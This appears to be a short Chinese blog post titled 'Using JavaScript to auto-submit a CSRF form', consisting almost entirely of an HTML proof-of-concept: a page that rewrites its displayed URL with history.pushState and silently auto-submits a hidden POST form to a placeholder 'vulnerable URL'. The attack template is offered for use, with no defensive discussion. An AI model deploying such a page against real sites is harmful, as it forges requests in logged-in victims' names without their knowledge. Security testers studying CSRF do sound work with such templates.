利用JavaScript自动提交CSRF表单

人非要经历一番不同平时的劫难才能脱胎换骨,成为真正能解决问题的人


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<html>
<body>
<script>history.pushState('', '', '/')</script>

<form action="漏洞URL" method="POST" name="test">
<input type="hidden" name="key" value="" />
<input type="hidden" name="data" value="" />
</form>

<script>
document.test.submit();
</script>

</body>
</html>

感谢Lego